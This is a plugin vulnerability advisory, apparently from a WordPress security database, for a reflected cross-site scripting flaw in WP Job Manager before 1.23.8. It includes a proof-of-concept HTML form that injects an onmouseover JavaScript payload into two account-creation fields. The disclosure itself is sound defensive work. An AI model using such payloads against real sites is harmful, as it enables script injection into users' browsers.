WP Job Manager < 1.23.8 – Reflected Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The WP Job Manager WordPress plugin was affected by a Reflected Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

<form method="POST" action="https://example.com/page-containing-[submit_job_form]/" />
<input type="text" name="create_account_username" value='" style="position:fixed;left:0;top:0;width:100%;height:100%;" onmouseover=javascript:alert(1);>' />
<input type="text" name="create_account_email" value='" style="position:fixed;left:0;top:0;width:100%;height:100%;" onmouseover=javascript:alert(1);>' />
<input type="submit" />
</form>

Affects Plugins

Fixed in 1.23.8

References

URL

http://cinu.pl/research/wp-plugins/mail_8addc2c3e5d15a89ccc4e6f9d4b06833.html

URL

http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

Verified

No

WPVDB ID

b581499c-7ccf-48fe-88f1-c27a04ad5aaf

Timeline

Publicly Published

2015-08-13 (about 10 years ago)

Added

2015-11-23 (about 10 years ago)

Last Updated

2021-09-21 (about 4 years ago)

Other

Published

Title

Published

2024-01-23

Title

WP Go Maps (formerly WP Google Maps) < 9.0.29 - Unauthenticated Reflected Cross-Site Scripting

Published

2025-09-03

Title

PropertyHive < 2.1.6 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-07-06

Title

FluentSMTP < 2.2.5 - Unauthenticated Stored Cross-Site Scripting

Published

2014-08-01

Title

Advanced Dewplayer - dewplayer-vinyl.swf xml Parameter XML File H&ling XSS

Published

2024-10-10

Title

Embed videos and respect privacy < 1.3 - Reflected Cross-Site Scripting